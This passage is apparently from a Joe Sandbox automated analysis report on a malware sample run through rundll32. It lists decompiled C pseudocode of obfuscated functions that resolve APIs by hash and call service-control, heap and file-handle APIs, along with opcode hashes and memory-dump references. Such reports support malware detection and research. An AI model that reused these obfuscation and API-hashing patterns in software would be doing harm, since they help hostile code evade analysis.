                                                                                                                                                                            				return _t58;
                                                                                                                                                                            			}












                                                                                                                                                                            0x00c44517
                                                                                                                                                                            0x00c4451c
                                                                                                                                                                            0x00c4452d
                                                                                                                                                                            0x00c44532
                                                                                                                                                                            0x00c44537
                                                                                                                                                                            0x00c4453e
                                                                                                                                                                            0x00c44545
                                                                                                                                                                            0x00c4454c
                                                                                                                                                                            0x00c44553
                                                                                                                                                                            0x00c4455a
                                                                                                                                                                            0x00c44561
                                                                                                                                                                            0x00c44568
                                                                                                                                                                            0x00c4456f
                                                                                                                                                                            0x00c44573
                                                                                                                                                                            0x00c4457a
                                                                                                                                                                            0x00c44584
                                                                                                                                                                            0x00c4458c
                                                                                                                                                                            0x00c4458f
                                                                                                                                                                            0x00c44596
                                                                                                                                                                            0x00c445b2
                                                                                                                                                                            0x00c445c4
                                                                                                                                                                            0x00c445c9

                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 00C445C4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.263561510.0000000000C21000.00000020.00000001.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.263555474.0000000000C20000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000007.00000002.263585875.0000000000C46000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_c20000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileHandleInformation
                                                                                                                                                                            • String ID: XQ
                                                                                                                                                                            • API String ID: 3935143524-1200779947
                                                                                                                                                                            • Opcode ID: 81dfb277e86e3c1fe3069d107eacbb6aa7e5857e87f0bf20d0672193a35411da
                                                                                                                                                                            • Instruction ID: 2f4c199262e27647f0421065ba8b14cb99f0267c64d655e25e09c0242d37ac0d
                                                                                                                                                                            • Opcode Fuzzy Hash: 81dfb277e86e3c1fe3069d107eacbb6aa7e5857e87f0bf20d0672193a35411da
                                                                                                                                                                            • Instruction Fuzzy Hash: 02214A71E4020CFBEF04DFE5DC4AA9EBBB1EF54704F108189B910B6290D3B59A649F40
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                            			E00C2EE62(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16, short* _a20) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				void* _t34;
                                                                                                                                                                            				void* _t41;
                                                                                                                                                                            				void* _t44;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a20);
                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                            				_push(_a16);
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E00C3FE29(_t34);
                                                                                                                                                                            				_v20 = 0xea751a;
                                                                                                                                                                            				_v20 = _v20 | 0xe9b69993;
                                                                                                                                                                            				_v20 = _v20 ^ 0xe9f29d6b;
                                                                                                                                                                            				_v16 = 0x605393;
                                                                                                                                                                            				_v16 = _v16 | 0xcc974431;
                                                                                                                                                                            				_v16 = _v16 ^ 0xccf8b40a;
                                                                                                                                                                            				_v12 = 0x102a1a;
                                                                                                                                                                            				_v12 = _v12 + 0xcb09;
                                                                                                                                                                            				_v12 = _v12 ^ 0x001131dd;
                                                                                                                                                                            				_v8 = 0x570378;
                                                                                                                                                                            				_v8 = _v8 >> 5;
                                                                                                                                                                            				_v8 = _v8 ^ 0xef617e60;
                                                                                                                                                                            				_v8 = _v8 ^ 0xef696bf9;
                                                                                                                                                                            				E00C2EB52(__ecx, __ecx, 0x5c98ffad, 5, 0x1f76e49f);
                                                                                                                                                                            				_t41 = OpenServiceW(_t44, _a20, _a16); // executed
                                                                                                                                                                            				return _t41;
                                                                                                                                                                            			}










                                                                                                                                                                            0x00c2ee69
                                                                                                                                                                            0x00c2ee6c
                                                                                                                                                                            0x00c2ee6e
                                                                                                                                                                            0x00c2ee71
                                                                                                                                                                            0x00c2ee74
                                                                                                                                                                            0x00c2ee77
                                                                                                                                                                            0x00c2ee7a
                                                                                                                                                                            0x00c2ee7b
                                                                                                                                                                            0x00c2ee7c
                                                                                                                                                                            0x00c2ee81
                                                                                                                                                                            0x00c2ee8b
                                                                                                                                                                            0x00c2ee92
                                                                                                                                                                            0x00c2ee99
                                                                                                                                                                            0x00c2eea0
                                                                                                                                                                            0x00c2eea7
                                                                                                                                                                            0x00c2eeae
                                                                                                                                                                            0x00c2eeb5
                                                                                                                                                                            0x00c2eebc
                                                                                                                                                                            0x00c2eec3
                                                                                                                                                                            0x00c2eeca
                                                                                                                                                                            0x00c2eece
                                                                                                                                                                            0x00c2eed5
                                                                                                                                                                            0x00c2eef6
                                                                                                                                                                            0x00c2ef05
                                                                                                                                                                            0x00c2ef0b

                                                                                                                                                                            APIs
                                                                                                                                                                            • OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C2EF05
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.263561510.0000000000C21000.00000020.00000001.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.263555474.0000000000C20000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000007.00000002.263585875.0000000000C46000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_c20000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: OpenService
                                                                                                                                                                            • String ID: `~a
                                                                                                                                                                            • API String ID: 3098006287-142445290
                                                                                                                                                                            • Opcode ID: 6383736253cef5703bc9a023e52ac128717e5205db758edbe98fcd92a09a10c3
                                                                                                                                                                            • Instruction ID: d4131644f4b1761a600f73d1f302dad203ba0c803fc68e16d7bb25beae624c78
                                                                                                                                                                            • Opcode Fuzzy Hash: 6383736253cef5703bc9a023e52ac128717e5205db758edbe98fcd92a09a10c3
                                                                                                                                                                            • Instruction Fuzzy Hash: AD11F275C01218FBCF48EFA5DD0A8DEBFB5EB04310F108988F92562261D3B58A20EF91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                            			E00C3648A(long __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				unsigned int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				void* _t41;
                                                                                                                                                                            				void* _t49;
                                                                                                                                                                            				long _t52;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a16);
                                                                                                                                                                            				_t52 = __ecx;
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E00C3FE29(_t41);
                                                                                                                                                                            				_v12 = 0x3cd3f;
                                                                                                                                                                            				_v12 = _v12 << 3;
                                                                                                                                                                            				_v12 = _v12 | 0xc677f757;
                                                                                                                                                                            				_v12 = _v12 >> 7;
                                                                                                                                                                            				_v12 = _v12 ^ 0x0188bcff;
                                                                                                                                                                            				_v20 = 0x40fc9e;
                                                                                                                                                                            				_v20 = _v20 << 4;
                                                                                                                                                                            				_v20 = _v20 ^ 0x040306b1;
                                                                                                                                                                            				_v16 = 0x159e9f;
                                                                                                                                                                            				_v16 = _v16 + 0xffffd0d5;
                                                                                                                                                                            				_v16 = _v16 * 0x33;
                                                                                                                                                                            				_v16 = _v16 ^ 0x04433238;
                                                                                                                                                                            				_v8 = 0x8a430d;
                                                                                                                                                                            				_v8 = _v8 + 0xffffdfbc;
                                                                                                                                                                            				_v8 = _v8 | 0x5356d001;
                                                                                                                                                                            				_v8 = _v8 + 0x638e;
                                                                                                                                                                            				_v8 = _v8 ^ 0x53d0144a;
                                                                                                                                                                            				E00C2EB52(__ecx, __ecx, 0x958aafc8, 0x1c3, 0xa2289af1);
                                                                                                                                                                            				_t49 = RtlAllocateHeap(_a12, _a16, _t52); // executed
                                                                                                                                                                            				return _t49;
                                                                                                                                                                            			}










                                                                                                                                                                            0x00c36491
                                                                                                                                                                            0x00c36494
                                                                                                                                                                            0x00c36496
                                                                                                                                                                            0x00c36499
                                                                                                                                                                            0x00c3649c
                                                                                                                                                                            0x00c364a0
                                                                                                                                                                            0x00c364a1
                                                                                                                                                                            0x00c364a6
                                                                                                                                                                            0x00c364b0
                                                                                                                                                                            0x00c364b4
                                                                                                                                                                            0x00c364bb
                                                                                                                                                                            0x00c364bf
                                                                                                                                                                            0x00c364c6
                                                                                                                                                                            0x00c364cd
                                                                                                                                                                            0x00c364d1
                                                                                                                                                                            0x00c364d8
                                                                                                                                                                            0x00c364df
                                                                                                                                                                            0x00c364fa
                                                                                                                                                                            0x00c364fd
                                                                                                                                                                            0x00c36504
                                                                                                                                                                            0x00c3650b
                                                                                                                                                                            0x00c36512
                                                                                                                                                                            0x00c36519
                                                                                                                                                                            0x00c36520
                                                                                                                                                                            0x00c36534
                                                                                                                                                                            0x00c36543
                                                                                                                                                                            0x00c36549

                                                                                                                                                                            APIs
                                                                                                                                                                            • RtlAllocateHeap.NTDLL(040306B1,?,ED94606E,?,?,?,?,?,?,?,?,?,?,?), ref: 00C36543
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.263561510.0000000000C21000.00000020.00000001.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.263555474.0000000000C20000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000007.00000002.263585875.0000000000C46000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_c20000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                            • Opcode ID: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
                                                                                                                                                                            • Instruction ID: a764ca54b657f505d93c94f6075312bec0679bec9b4e1a6f89c1695938e7cae8
                                                                                                                                                                            • Opcode Fuzzy Hash: f41072fe55694ed81fb5a2d434f63a6d1651ccbd0ba08c91d6bc4f92d8fba8a5
                                                                                                                                                                            • Instruction Fuzzy Hash: 2A1103B2C0121DFBDF05DFA5D9098CEBBB4FB00314F108598E811B6250E3B59B149F91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                            			E00C3E8B6(void* __ecx, void* __edx, intOrPtr _a4, int _a12, intOrPtr _a16) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				unsigned int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				void* _t29;
                                                                                                                                                                            				void* _t37;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a16);
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				E00C3FE29(_t29);
                                                                                                                                                                            				_v20 = 0xc8e76b;
                                                                                                                                                                            				_v20 = _v20 | 0x270203a1;
                                                                                                                                                                            				_v20 = _v20 ^ 0x27c97096;
                                                                                                                                                                            				_v16 = 0x55aebc;
                                                                                                                                                                            				_v16 = _v16 >> 2;
                                                                                                                                                                            				_v16 = _v16 ^ 0x00171a80;
                                                                                                                                                                            				_v12 = 0xfad6fe;
                                                                                                                                                                            				_v12 = _v12 ^ 0xd14a4d1d;
                                                                                                                                                                            				_v12 = _v12 ^ 0xd1b10da7;
                                                                                                                                                                            				_v8 = 0x428060;
                                                                                                                                                                            				_v8 = _v8 * 0x54;
                                                                                                                                                                            				_v8 = _v8 ^ 0x15de1a76;
                                                                                                                                                                            				E00C2EB52(__ecx, __ecx, 0x3c0b385, 0x1bc, 0x1f76e49f);
                                                                                                                                                                            				_t37 = OpenSCManagerW(0, 0, _a12); // executed
                                                                                                                                                                            				return _t37;
                                                                                                                                                                            			}









                                                                                                                                                                            0x00c3e8bd
                                                                                                                                                                            0x00c3e8c2
                                                                                                                                                                            0x00c3e8c5
                                                                                                                                                                            0x00c3e8c6
                                                                                                                                                                            0x00c3e8ca
                                                                                                                                                                            0x00c3e8cb
                                                                                                                                                                            0x00c3e8d0
                                                                                                                                                                            0x00c3e8da
                                                                                                                                                                            0x00c3e8e1
                                                                                                                                                                            0x00c3e8e8
                                                                                                                                                                            0x00c3e8ef
                                                                                                                                                                            0x00c3e8f3
                                                                                                                                                                            0x00c3e8fa
                                                                                                                                                                            0x00c3e901
                                                                                                                                                                            0x00c3e908
                                                                                                                                                                            0x00c3e90f
                                                                                                                                                                            0x00c3e92a
                                                                                                                                                                            0x00c3e92d
                                                                                                                                                                            0x00c3e941
                                                                                                                                                                            0x00c3e94e
                                                                                                                                                                            0x00c3e954

                                                                                                                                                                            APIs
                                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,27C97096,?,?,?,?,?,?,?,?,?,?,?), ref: 00C3E94E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.263561510.0000000000C21000.00000020.00000001.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.263555474.0000000000C20000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000007.00000002.263585875.0000000000C46000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_c20000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ManagerOpen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1889721586-0
                                                                                                                                                                            • Opcode ID: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
                                                                                                                                                                            • Instruction ID: 95dd5565fda560a5099d3f248734c20bbbd1f9fd80e7764abb8150f0f89dd4d7
                                                                                                                                                                            • Opcode Fuzzy Hash: 938ae55f57f10c9ec9f30609793a9938b44550d2e06b30d2dbdd077d207e708c
                                                                                                                                                                            • Instruction Fuzzy Hash: 7911E571D0221DFB9B04EFA999468DEBFB4EB04304F118598E925B2211D3B19B149B95
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00C3D11A() {
                                                                                                                                                                            				unsigned int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                            				void* _t39;
                                                                                                                                                                            
                                                                                                                                                                            				_v24 = _v24 & 0x00000000;
                                                                                                                                                                            				_v36 = 0x78f5c7;
                                                                                                                                                                            				_v32 = 0xa12bb9;
                                                                                                                                                                            				_v28 = 0x4eca09;
                                                                                                                                                                            				_v8 = 0x8b256f;
                                                                                                                                                                            				_v8 = _v8 << 0xb;
                                                                                                                                                                            				_v8 = _v8 ^ 0x4a7d0011;
                                                                                                                                                                            				_v8 = _v8 >> 9;
                                                                                                                                                                            				_v8 = _v8 ^ 0x00073d60;
                                                                                                                                                                            				_v20 = 0x1e549a;
                                                                                                                                                                            				_v20 = _v20 + 0xffffad33;
                                                                                                                                                                            				_v20 = _v20 ^ 0x00134b4f;
                                                                                                                                                                            				_v16 = 0x8dd9dd;
                                                                                                                                                                            				_v16 = _v16 << 3;
                                                                                                                                                                            				_v16 = _v16 ^ 0x0460bc3c;
                                                                                                                                                                            				_v12 = 0x358059;
                                                                                                                                                                            				_v12 = _v12 + 0xb97b;
                                                                                                                                                                            				_v12 = _v12 ^ 0x003502df;
                                                                                                                                                                            				E00C2EB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
                                                                                                                                                                            				ExitProcess(0);
                                                                                                                                                                            			}












                                                                                                                                                                            0x00c3d120
                                                                                                                                                                            0x00c3d124
                                                                                                                                                                            0x00c3d12b
                                                                                                                                                                            0x00c3d132
                                                                                                                                                                            0x00c3d139
                                                                                                                                                                            0x00c3d140
                                                                                                                                                                            0x00c3d144
                                                                                                                                                                            0x00c3d14b
                                                                                                                                                                            0x00c3d14f
                                                                                                                                                                            0x00c3d156
                                                                                                                                                                            0x00c3d15d
                                                                                                                                                                            0x00c3d164
                                                                                                                                                                            0x00c3d16b
                                                                                                                                                                            0x00c3d172
                                                                                                                                                                            0x00c3d176
                                                                                                                                                                            0x00c3d17d
                                                                                                                                                                            0x00c3d184
                                                                                                                                                                            0x00c3d18b
                                                                                                                                                                            0x00c3d1ac
                                                                                                                                                                            0x00c3d1b6

                                                                                                                                                                            APIs
                                                                                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 00C3D1B6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.263561510.0000000000C21000.00000020.00000001.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.263555474.0000000000C20000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000007.00000002.263585875.0000000000C46000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_c20000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                                            • Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                                                                                            • Instruction ID: 307b5d19f1be00b302f994dc52755239c69e0e7abafe5d70572836033465cebe
                                                                                                                                                                            • Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
                                                                                                                                                                            • Instruction Fuzzy Hash: 961112B1C4030CEBDB44DFE5D94A6DEFBB0EB00708F108588D521B6240D3B89B489F90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                            			E00C4061D(void* __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				void* _t44;
                                                                                                                                                                            				int _t53;
                                                                                                                                                                            				WCHAR* _t56;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_t56 = __edx;
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E00C3FE29(_t44);
                                                                                                                                                                            				_v24 = _v24 & 0x00000000;
                                                                                                                                                                            				_v28 = 0xcd60b7;
                                                                                                                                                                            				_v12 = 0x7257ab;
                                                                                                                                                                            				_v12 = _v12 << 0xd;
                                                                                                                                                                            				_v12 = _v12 + 0x8f69;
                                                                                                                                                                            				_v12 = _v12 * 0x4c;
                                                                                                                                                                            				_v12 = _v12 ^ 0x410f7a13;
                                                                                                                                                                            				_v8 = 0x7b4696;
                                                                                                                                                                            				_v8 = _v8 + 0xffff4950;
                                                                                                                                                                            				_v8 = _v8 | 0x2a0f624b;
                                                                                                                                                                            				_v8 = _v8 * 0x3a;
                                                                                                                                                                            				_v8 = _v8 ^ 0xa0f3ec54;
                                                                                                                                                                            				_v20 = 0x8a2161;
                                                                                                                                                                            				_v20 = _v20 + 0xffff45ea;
                                                                                                                                                                            				_v20 = _v20 ^ 0x1b6c7fa6;
                                                                                                                                                                            				_v20 = _v20 ^ 0x1be8dede;
                                                                                                                                                                            				_v16 = 0xdcc12a;
                                                                                                                                                                            				_v16 = _v16 + 0xb9f4;
                                                                                                                                                                            				_v16 = _v16 + 0xffffcfef;
                                                                                                                                                                            				_v16 = _v16 ^ 0x00d9de04;
                                                                                                                                                                            				E00C2EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
                                                                                                                                                                            				_t53 = lstrcmpiW(_a4, _t56); // executed
                                                                                                                                                                            				return _t53;
                                                                                                                                                                            			}












                                                                                                                                                                            0x00c40624
                                                                                                                                                                            0x00c40627
                                                                                                                                                                            0x00c40629
                                                                                                                                                                            0x00c4062c
                                                                                                                                                                            0x00c4062f
                                                                                                                                                                            0x00c40630
                                                                                                                                                                            0x00c40631
                                                                                                                                                                            0x00c40636
                                                                                                                                                                            0x00c4063d
                                                                                                                                                                            0x00c40644
                                                                                                                                                                            0x00c4064b
                                                                                                                                                                            0x00c4064f
                                                                                                                                                                            0x00c40667
                                                                                                                                                                            0x00c4066a
                                                                                                                                                                            0x00c40671
                                                                                                                                                                            0x00c40678
                                                                                                                                                                            0x00c4067f
                                                                                                                                                                            0x00c4068b
                                                                                                                                                                            0x00c4068e
                                                                                                                                                                            0x00c40695
                                                                                                                                                                            0x00c4069c
                                                                                                                                                                            0x00c406a3
                                                                                                                                                                            0x00c406aa
                                                                                                                                                                            0x00c406b1
                                                                                                                                                                            0x00c406b8
                                                                                                                                                                            0x00c406bf
                                                                                                                                                                            0x00c406c6
                                                                                                                                                                            0x00c406d9
                                                                                                                                                                            0x00c406e5
                                                                                                                                                                            0x00c406eb

                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrcmpiW.KERNEL32(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00C406E5
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.263561510.0000000000C21000.00000020.00000001.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.263555474.0000000000C20000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000007.00000002.263585875.0000000000C46000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_c20000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcmpi
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1586166983-0
                                                                                                                                                                            • Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                                                                                            • Instruction ID: b5e3cd79bdb1a1b120d25ad58cb6ec2baaeb8ac2b634bfcc438114ab8b8a303d
                                                                                                                                                                            • Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                                                                                                                                                                            • Instruction Fuzzy Hash: 68210FB1C01219ABCF14DFA9D98A99EBFB5FB20354F108298E529A6251D3B48B04DB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                            C-Code - Quality: 99%
                                                                                                                                                                            			E00C3CCD9(void* __ecx, void* __edx) {
                                                                                                                                                                            				signed int _v4;
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				signed int _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				signed int _v92;
                                                                                                                                                                            				signed int _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				void* _t242;
                                                                                                                                                                            				intOrPtr _t243;
                                                                                                                                                                            				intOrPtr _t244;
                                                                                                                                                                            				void* _t248;
                                                                                                                                                                            				signed int _t250;
                                                                                                                                                                            				signed int _t251;
                                                                                                                                                                            				signed int _t252;
                                                                                                                                                                            				signed int _t253;
                                                                                                                                                                            				signed int _t254;
                                                                                                                                                                            				void* _t282;
                                                                                                                                                                            				void* _t283;
                                                                                                                                                                            				signed int _t285;
                                                                                                                                                                            				signed int* _t287;
                                                                                                                                                                            				signed int* _t288;
                                                                                                                                                                            
                                                                                                                                                                            				_t287 =  &_v100;
                                                                                                                                                                            				_v4 = _v4 & 0x00000000;
                                                                                                                                                                            				_v8 = 0x71e8b0;
                                                                                                                                                                            				_v36 = 0x18cf5b;
                                                                                                                                                                            				_v36 = _v36 + 0x6698;
                                                                                                                                                                            				_v36 = _v36 ^ 0x001a117a;
                                                                                                                                                                            				_v60 = 0xa2890;
                                                                                                                                                                            				_t282 = __edx;
                                                                                                                                                                            				_t248 = __ecx;
                                                                                                                                                                            				_t283 = 0x72ed85;
                                                                                                                                                                            				_t250 = 0x42;
                                                                                                                                                                            				_v60 = _v60 / _t250;
                                                                                                                                                                            				_v60 = _v60 ^ 0xe73bacde;
                                                                                                                                                                            				_v60 = _v60 ^ 0xe73fbe74;
                                                                                                                                                                            				_v40 = 0x9c8291;
                                                                                                                                                                            				_t251 = 0x70;
                                                                                                                                                                            				_v40 = _v40 / _t251;
                                                                                                                                                                            				_v40 = _v40 ^ 0x000cc374;
                                                                                                                                                                            				_v64 = 0xa8df6e;
                                                                                                                                                                            				_t252 = 0x66;
                                                                                                                                                                            				_v64 = _v64 * 0x5a;
                                                                                                                                                                            				_v64 = _v64 | 0x6df616d5;
                                                                                                                                                                            				_v64 = _v64 ^ 0x7ff9e958;
                                                                                                                                                                            				_v88 = 0xc174cb;
                                                                                                                                                                            				_v88 = _v88 ^ 0xe7b64a13;
                                                                                                                                                                            				_v88 = _v88 ^ 0xc84137a7;
                                                                                                                                                                            				_v88 = _v88 << 0xc;
                                                                                                                                                                            				_v88 = _v88 ^ 0x60915aca;
                                                                                                                                                                            				_v32 = 0x752193;
                                                                                                                                                                            				_v32 = _v32 * 0x3f;
                                                                                                                                                                            				_v32 = _v32 ^ 0x1cda7702;
                                                                                                                                                                            				_v92 = 0x141833;
                                                                                                                                                                            				_v92 = _v92 + 0xffffc8f8;
                                                                                                                                                                            				_v92 = _v92 + 0xf362;
                                                                                                                                                                            				_v92 = _v92 << 0x10;
                                                                                                                                                                            				_v92 = _v92 ^ 0xd48431d2;
                                                                                                                                                                            				_v96 = 0xc34044;
                                                                                                                                                                            				_v96 = _v96 << 8;
                                                                                                                                                                            				_v96 = _v96 + 0xffff536d;
                                                                                                                                                                            				_v96 = _v96 + 0x5d23;
                                                                                                                                                                            				_v96 = _v96 ^ 0xc334c852;
                                                                                                                                                                            				_v20 = 0x3a6348;
                                                                                                                                                                            				_v20 = _v20 << 0x10;
                                                                                                                                                                            				_v20 = _v20 ^ 0x6343ca6d;
                                                                                                                                                                            				_v56 = 0x49cd71;
                                                                                                                                                                            				_v56 = _v56 ^ 0x72d9145f;
                                                                                                                                                                            				_v56 = _v56 + 0x4f98;
                                                                                                                                                                            				_v56 = _v56 ^ 0x7290366b;
                                                                                                                                                                            				_v24 = 0x3bf83a;
                                                                                                                                                                            				_v24 = _v24 << 9;
                                                                                                                                                                            				_v24 = _v24 ^ 0x77f6a760;
                                                                                                                                                                            				_v28 = 0x632842;
                                                                                                                                                                            				_v28 = _v28 + 0xffffe69b;
                                                                                                                                                                            				_v28 = _v28 ^ 0x006ee443;
                                                                                                                                                                            				_v48 = 0x4b2ed5;
                                                                                                                                                                            				_v48 = _v48 ^ 0x82c7a85b;
                                                                                                                                                                            				_v48 = _v48 + 0xffff7c4b;
                                                                                                                                                                            				_v48 = _v48 ^ 0x8282f052;
                                                                                                                                                                            				_v52 = 0x4c7b52;
                                                                                                                                                                            				_v52 = _v52 + 0xffffbc1f;
                                                                                                                                                                            				_v52 = _v52 + 0x2e12;
                                                                                                                                                                            				_v52 = _v52 ^ 0x004752b1;
                                                                                                                                                                            				_v16 = 0x3a13fc;
                                                                                                                                                                            				_v16 = _v16 / _t252;
                                                                                                                                                                            				_v16 = _v16 ^ 0x00081e0d;
